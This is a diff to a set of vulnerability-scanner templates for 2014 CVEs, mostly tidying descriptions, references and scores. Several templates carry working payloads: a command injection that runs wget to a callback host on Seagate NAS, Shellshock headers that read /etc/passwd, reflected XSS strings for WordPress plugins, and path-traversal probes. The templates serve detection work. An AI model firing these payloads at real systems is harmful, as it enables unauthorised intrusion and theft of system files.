@@ +id: CVE-2014-3206 + +info: + name: Seagate BlackArmor NAS - Command Injection + author: gy741 + severity: critical + description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 + - https://www.exploit-db.com/exploits/33159 + - https://www.exploit-db.com/exploits/33159/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-3206 + cwe-id: CWE-20 + tags: cve,cve2014,seagate,rce + +requests: + - raw: + - | + GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + unsafe: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-3704.yaml b/cves/2014/CVE-2014-3704.yaml index 883f72ee3c..8fc7a922aa 100644 --- a/cves/2014/CVE-2014-3704.yaml +++ b/cves/2014/CVE-2014-3704.yaml @@ -1,15 +1,21 @@ id: CVE-2014-3704 + info: - name: Drupal Sql Injetion + name: Drupal SQL Injection author: princechaddha severity: high - description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. + description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. reference: + - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql + - https://nvd.nist.gov/vuln/detail/CVE-2014-3704 - https://www.drupal.org/SA-CORE-2014-005 - - http://www.exploit-db.com/exploits/34984 - - http://www.exploit-db.com/exploits/34992 - - http://www.exploit-db.com/exploits/34993 - - http://www.exploit-db.com/exploits/35150 + - https://www.exploit-db.com/exploits/34984 + - https://www.exploit-db.com/exploits/34992 + - https://www.exploit-db.com/exploits/34993 + - https://www.exploit-db.com/exploits/35150 + remediation: Upgrade to Drupal core 7.32 or later. + classification: + cve-id: CVE-2014-3704 tags: cve,cve2014,drupal,sqli requests: @@ -30,3 +36,5 @@ requests: - "e807f1fcf82d132f9bb018ca6738a19f" condition: and part: body + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index b593394d70..7ea04e9257 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -3,17 +3,19 @@ id: CVE-2014-3744 info: name: Node.js st module Directory Traversal author: geeknik - description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. + severity: high + description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-3744 - https://github.com/advisories/GHSA-69rr-wvh9-6c4q - https://snyk.io/vuln/npm:st:20140206 - severity: high - tags: cve,cve2014,lfi,nodejs,st + - https://nodesecurity.io/advisories/st_directory_traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2014-3744 cwe-id: CWE-22 + tags: cve,cve2014,lfi,nodejs,st requests: - method: GET @@ -28,3 +30,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index 96c90f1486..542304e727 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -4,11 +4,15 @@ info: name: Weblogic SSRF in SearchPublicRegistries.jsp author: princechaddha severity: medium - tags: cve,cve2014,weblogic,oracle,ssrf,oast + description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. reference: + - https://www.oracle.com/security-alerts/cpujul2014.html - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html - description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services." + - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html + classification: + cve-id: CVE-2014-4210 + tags: cve,cve2014,weblogic,oracle,ssrf,oast requests: - method: GET @@ -22,6 +26,8 @@ requests: - 200 - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml index 2661d56866..4ddd6f9c7a 100644 --- a/cves/2014/CVE-2014-4513.yaml +++ b/cves/2014/CVE-2014-4513.yaml @@ -1,11 +1,15 @@ id: CVE-2014-4513 info: - name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS) + name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513 + description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-4513 + - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss + classification: + cve-id: CVE-2014-4513 tags: cve,cve2014,wordpress,xss,wp-plugin requests: @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 8e6d8424d8..23d27ce4bf 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -1,24 +1,25 @@ id: CVE-2014-4535 info: - name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium + description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. reference: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4535 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index d226a920db..b2485663df 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml @@ -1,19 +1,21 @@ id: CVE-2014-4536 info: - name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium + description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://wordpress.org/plugins/infusionsoft/changelog + - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 - description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET @@ -35,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml index e990363423..8db0320e57 100644 --- a/cves/2014/CVE-2014-4539.yaml +++ b/cves/2014/CVE-2014-4539.yaml @@ -1,19 +1,20 @@ id: CVE-2014-4539 info: - name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + reference: - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4539 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml index 9db25c6960..df4e9ea1b5 100644 --- a/cves/2014/CVE-2014-4544.yaml +++ b/cves/2014/CVE-2014-4544.yaml @@ -1,24 +1,25 @@ id: CVE-2014-4544 info: - name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS + name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. + description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. reference: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" + - "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" matchers-condition: and matchers: @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml index 898d13a6bd..481cf4dd1d 100644 --- a/cves/2014/CVE-2014-4550.yaml +++ b/cves/2014/CVE-2014-4550.yaml @@ -1,24 +1,25 @@ id: CVE-2014-4550 info: - name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS + name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + reference: - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-shortcode-ninja-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4550 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" + - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml index 38f4f31020..8cd16f4e7b 100644 --- a/cves/2014/CVE-2014-4558.yaml +++ b/cves/2014/CVE-2014-4558.yaml @@ -1,24 +1,25 @@ id: CVE-2014-4558 info: - name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. + reference: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml index 257dd609d7..bac48b3878 100644 --- a/cves/2014/CVE-2014-4561.yaml +++ b/cves/2014/CVE-2014-4561.yaml @@ -1,24 +1,25 @@ id: CVE-2014-4561 info: - name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS + name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. + reference: - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - description: "The ultimate-weather plugin 1.0 for WordPress has XSS" + tags: cve,cve2014,wordpress,wp-plugin,xss,weather requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml index db868347e2..c2521e5d30 100644 --- a/cves/2014/CVE-2014-4592.yaml +++ b/cves/2014/CVE-2014-4592.yaml @@ -1,24 +1,25 @@ id: CVE-2014-4592 info: - name: WP Planet <= 0.1 - Unauthenticated Reflected XSS + name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. + reference: - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4592 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4940.yaml b/cves/2014/CVE-2014-4940.yaml index a2d4666d76..13f17a9af9 100644 --- a/cves/2014/CVE-2014-4940.yaml +++ b/cves/2014/CVE-2014-4940.yaml @@ -5,7 +5,12 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. - reference: https://www.cvedetails.com/cve/CVE-2014-4940 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= + - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ + classification: + cve-id: CVE-2014-4940 tags: cve,cve2014,wordpress,wp-plugin,lfi requests: @@ -18,8 +23,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-5111.yaml b/cves/2014/CVE-2014-5111.yaml index f525a4441f..f8a4d0004a 100644 --- a/cves/2014/CVE-2014-5111.yaml +++ b/cves/2014/CVE-2014-5111.yaml @@ -5,10 +5,13 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. - reference: | + reference: - https://www.exploit-db.com/exploits/39351 - - https://www.cvedetails.com/cve/CVE-2014-5111 - tags: cve,cve2014,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 + - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html + classification: + cve-id: CVE-2014-5111 + tags: cve,cve2014,lfi,trixbox requests: - method: GET @@ -20,8 +23,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-5258.yaml b/cves/2014/CVE-2014-5258.yaml index 70144e35a4..78a3979930 100644 --- a/cves/2014/CVE-2014-5258.yaml +++ b/cves/2014/CVE-2014-5258.yaml @@ -4,10 +4,14 @@ info: name: webEdition 6.3.8.0 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-5258 - https://www.exploit-db.com/exploits/34761 - - https://www.cvedetails.com/cve/CVE-2014-5258 + - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html + - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 + classification: + cve-id: CVE-2014-5258 tags: cve,cve2014,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-5368.yaml b/cves/2014/CVE-2014-5368.yaml index bf03c5374a..2856a69401 100644 --- a/cves/2014/CVE-2014-5368.yaml +++ b/cves/2014/CVE-2014-5368.yaml @@ -4,10 +4,14 @@ info: name: WordPress Plugin WP Content Source Control - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 - https://www.exploit-db.com/exploits/39287 - https://www.cvedetails.com/cve/CVE-2014-5368 + - http://seclists.org/oss-sec/2014/q3/417 + classification: + cve-id: CVE-2014-5368 tags: cve,cve2014,wordpress,wp-plugin,lfi requests: @@ -27,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 6c5db06412..66122b3290 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -1,44 +1,49 @@ -id: CVE-2014-6271 - -info: - name: Shellshock - author: pentest_swissky - severity: critical - description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications - reference: - - http://www.kb.cert.org/vuls/id/252743 - - http://www.us-cert.gov/ncas/alerts/TA14-268A - tags: cve,cve2014,rce - +id: CVE-2014-6271 + +info: + name: ShellShock - Remote Code Execution + author: pentest_swissky,0xelkomy + severity: critical + description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 + - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 + - http://www.kb.cert.org/vuls/id/252743 + - http://www.us-cert.gov/ncas/alerts/TA14-268A classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-6271 cwe-id: CWE-78 -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/cgi-bin/status" - - "{{BaseURL}}/cgi-bin/stats" - - "{{BaseURL}}/cgi-bin/test" - - "{{BaseURL}}/cgi-bin/status/status.cgi" - - "{{BaseURL}}/test.cgi" - - "{{BaseURL}}/debug.cgi" - - "{{BaseURL}}/cgi-bin/test-cgi" - headers: - Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" - part: body + tags: cve,cve2014,rce,shellshock + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/cgi-bin/status" + - "{{BaseURL}}/cgi-bin/stats" + - "{{BaseURL}}/cgi-bin/test" + - "{{BaseURL}}/cgi-bin/status/status.cgi" + - "{{BaseURL}}/test.cgi" + - "{{BaseURL}}/debug.cgi" + - "{{BaseURL}}/cgi-bin/test-cgi" + + headers: + Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/02/25 diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index 7b52384af9..f71050692f 100644 --- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -4,9 +4,15 @@ info: name: Osclass Security Advisory 3.4.1 - Local File Inclusion author: daffainfo severity: high - reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html + description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. + reference: + - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html + - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 + - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 + - https://www.netsparker.com/lfi-vulnerability-in-osclass/ + classification: + cve-id: CVE-2014-6308 tags: cve,cve2014,lfi - description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." requests: - method: GET 